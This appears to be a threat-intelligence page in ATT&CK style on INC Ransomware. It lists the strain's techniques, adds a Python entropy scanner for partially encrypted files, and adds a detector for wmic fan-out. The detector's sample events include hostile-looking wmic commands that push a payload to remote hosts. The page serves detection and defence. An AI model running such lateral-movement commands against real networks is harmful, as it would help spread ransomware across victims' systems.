INC Ransomware

INC Ransomware is a ransomware strain that has been used by the INC Ransom group since at least 2023 against multiple industry sectors worldwide. INC Ransomware can employ partial encryption combined with multi-threading to speed encryption.[1][2][3]

ID: S1139
Type: MALWARE
Platforms: Windows
Contributors: Matt Anderson, @nosecurething, Huntress
Version: 1.0
Created: 06 June 2024
Last Modified: 28 October 2024

Techniques Used

Domain ID Name Use
Enterprise T1486 Data Encrypted for Impact

INC Ransomware can encrypt data on victim systems, including through the use of partial encryption and multi-threading to speed encryption.[1][2][4][5]
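Partial (intermittent) encryption matters for defenders because a file that is only encrypted in stripes keeps a modest whole-file entropy and can slip past a naive "entropy above 7.x bits per byte" check. The script below is an added example, not INC code or anything from the cited reports: it computes Shannon entropy per block and flags a file when whole-file entropy stays low while a meaningful fraction of individual blocks look encrypted. The block size, thresholds and the sample "document" (plain text with every fourth block replaced by pseudo-random bytes standing in for ciphertext) are all constructed assumptions for the demonstration.

```python
import math
import random

# Scan parameters; assumptions for this example, not values taken from the page.
BLOCK_SIZE = 4096        # granularity at which encrypted runs are looked for
HIGH_ENTROPY = 7.2       # bits/byte; a block at or above this looks encrypted or compressed
MIN_HIGH_RATIO = 0.10    # fraction of high-entropy blocks needed to raise a verdict


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def scan_blocks(data: bytes, block_size: int = BLOCK_SIZE, threshold: float = HIGH_ENTROPY):
    """Return (whole-file entropy, [(offset, block entropy, is_high), ...])."""
    blocks = []
    for off in range(0, len(data), block_size):
        e = shannon_entropy(data[off:off + block_size])
        blocks.append((off, e, e >= threshold))
    return shannon_entropy(data), blocks


def looks_partially_encrypted(data: bytes, block_size: int = BLOCK_SIZE,
                              threshold: float = HIGH_ENTROPY,
                              min_ratio: float = MIN_HIGH_RATIO):
    """Verdict for intermittent encryption: the whole-file entropy stays below the
    threshold (so a naive whole-file check passes), yet at least min_ratio of the
    blocks are individually high-entropy.  Returns (verdict, high_block_ratio)."""
    whole, blocks = scan_blocks(data, block_size, threshold)
    if not blocks:
        return False, 0.0
    high_ratio = sum(1 for _, _, h in blocks if h) / len(blocks)
    return whole < threshold and high_ratio >= min_ratio, high_ratio


def build_sample(n_blocks: int = 64, every: int = 4, seed: int = 7) -> bytes:
    """Constructed test file: plain text with every `every`-th block replaced by
    pseudo-random bytes, standing in for a block an intermittent encryptor wrote.
    Random bytes are only a stand-in for ciphertext; no encryption is performed."""
    rng = random.Random(seed)
    sentence = b"Quarterly report: revenue, headcount and budget lines for review.\n"
    text_block = (sentence * (BLOCK_SIZE // len(sentence) + 1))[:BLOCK_SIZE]
    out = bytearray()
    for i in range(n_blocks):
        if i % every == every - 1:
            out += bytes(rng.randrange(256) for _ in range(BLOCK_SIZE))
        else:
            out += text_block
    return bytes(out)


def build_plain_sample(n_blocks: int = 64) -> bytes:
    """Constructed control file: the same text with no encrypted blocks."""
    return build_sample(n_blocks=n_blocks, every=n_blocks + 1)


if __name__ == "__main__":
    for name, sample in (("partial", build_sample()), ("plain", build_plain_sample())):
        whole, _ = scan_blocks(sample)
        verdict, ratio = looks_partially_encrypted(sample)
        print(f"{name}: whole-file entropy {whole:.2f} bits/byte, "
              f"{ratio:.0%} of blocks high-entropy -> {'FLAG' if verdict else 'ok'}")
```

On the constructed sample the whole-file entropy lands around 6 bits per byte, below the threshold, while a quarter of the blocks individually exceed it; a whole-file check would call the file clean and the per-block scan flags it. The ratio threshold is the knob to tune against legitimately mixed files such as archives embedded in documents.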

Enterprise T1491.001 Defacement: Internal Defacement

INC Ransomware has the ability to change the background wallpaper image to display the ransom note.[4][3]

Enterprise T1140 Deobfuscate/Decode Files or Information

INC Ransomware can call CryptStringToBinaryA to decode the base64-encoded content containing its ransom note.[4]

Enterprise T1652 Device Driver Discovery

INC Ransomware can verify the presence of specific drivers on compromised hosts including Microsoft Print to PDF and Microsoft XPS Document Writer.[4]

Enterprise T1083 File and Directory Discovery

INC Ransomware can receive command line arguments to encrypt specific files and directories.[4][1]

Enterprise T1490 Inhibit System Recovery

INC Ransomware can delete volume shadow copy backups from victim machines.[4]

Enterprise T1570 Lateral Tool Transfer

INC Ransomware can push its encryption executable to multiple endpoints within compromised infrastructure.[2]

Enterprise T1106 Native API

INC Ransomware can call the DeviceIoControl API to shrink the storage area allocated to volume shadow copy snapshots, causing Windows to delete them.[4]

Enterprise T1135 Network Share Discovery

INC Ransomware has the ability to check for shared network drives to encrypt.[4]

Enterprise T1120 Peripheral Device Discovery

INC Ransomware can identify external USB and hard drives for encryption and printers to print ransom notes.[4]

Enterprise T1566 Phishing

INC Ransomware campaigns have used spearphishing emails for initial access.[1]

Enterprise T1057 Process Discovery

INC Ransomware can use the Win32 Restart Manager API to enumerate processes that hold handles to, or are otherwise using, the files it intends to encrypt, and then terminate them so the files can be opened for writing.[4]

Enterprise T1489 Service Stop

INC Ransomware can issue a command to kill a process on compromised hosts.[4]

Enterprise T1082 System Information Discovery

INC Ransomware can discover and mount hidden drives to encrypt them.[4]

Enterprise T1047 Windows Management Instrumentation

INC Ransomware has the ability to use wmic.exe to spread to multiple endpoints within a compromised environment.[2][3]
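Both the Lateral Tool Transfer and the WMI entries above describe the same observable: one host driving wmic.exe against many others. The detection below is an added example written for this page, not code from the cited reports or from the INC tooling, and it runs over constructed process-creation events in a Sysmon-like shape (fields host, ts, parent, image, cmdline are assumed). It flags wmic.exe invocations that carry a `/node:` target together with the `process call create` verb (standard wmic syntax for remote process creation) and raises a fan-out alert when a single source host reaches several distinct remote targets inside a short window. The hostnames, paths and payload name in the sample are made up.

```python
import re
from collections import defaultdict

# wmic accepts /node:"host" or /node:host, and a comma-separated list of hosts.
NODE_RE = re.compile(r'/node:(?:"([^"]*)"|(\S+))', re.IGNORECASE)
CREATE_RE = re.compile(r'\bprocess\s+call\s+create\b', re.IGNORECASE)

# Constructed sample events (assumed Sysmon-like shape); ts is seconds since an arbitrary epoch.
SAMPLE_EVENTS = [
    {"host": "FS01", "ts": 0, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic computersystem get name"},
    {"host": "FS01", "ts": 30, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic /node:"WS-101" process call create "cmd.exe /c \\FS01\staging\payload.exe"'},
    {"host": "FS01", "ts": 75, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic /node:WS-102,WS-103 process call create "cmd.exe /c \\FS01\staging\payload.exe"'},
    {"host": "FS01", "ts": 90, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic /node:"WS-104" os get caption'},           # remote query, not creation
    {"host": "ADMIN01", "ts": 4000, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic /node:"WS-200" process call create "notepad.exe"'},  # single target
]


def is_wmic(image: str) -> bool:
    """True when the image path's file name is wmic.exe (case-insensitive)."""
    return image.lower().replace("/", "\\").rsplit("\\", 1)[-1] == "wmic.exe"


def remote_targets(cmdline: str) -> list:
    """Hosts named in a /node: switch, or [] when the command is local."""
    m = NODE_RE.search(cmdline)
    if not m:
        return []
    raw = m.group(1) if m.group(1) is not None else m.group(2)
    return [t.strip().strip('"') for t in raw.split(",") if t.strip()]


def is_remote_process_create(ev: dict) -> bool:
    """wmic.exe launching a process on at least one remote node."""
    return (is_wmic(ev["image"])
            and CREATE_RE.search(ev["cmdline"]) is not None
            and bool(remote_targets(ev["cmdline"])))


def find_fan_out(events: list, window_s: int = 600, min_targets: int = 3) -> dict:
    """Map source host -> sorted distinct targets when that host reaches
    min_targets distinct remote process creations within window_s seconds."""
    by_host = defaultdict(list)
    for ev in events:
        if is_remote_process_create(ev):
            for tgt in remote_targets(ev["cmdline"]):
                by_host[ev["host"]].append((ev["ts"], tgt.lower()))
    alerts = {}
    for host, hits in by_host.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            seen = {tgt for ts, tgt in hits[i:] if ts - t0 <= window_s}
            if len(seen) >= min_targets:
                alerts[host] = sorted(seen)
                break
    return alerts


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{ev['host']:8} ts={ev['ts']:<5} remote_create={is_remote_process_create(ev)}")
    for host, targets in find_fan_out(SAMPLE_EVENTS).items():
        print(f"FAN-OUT from {host}: {', '.join(targets)}")
```

The per-event rule alone is noisy in environments where administrators script wmic; the fan-out count is what separates a one-off remote command from an encryptor being pushed across the estate. Pair the alert with the parent process and the command's payload path (here a UNC path on the source host) when triaging.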

Groups That Use This Software

ID Name References
G1032 INC Ransom [4][3]

References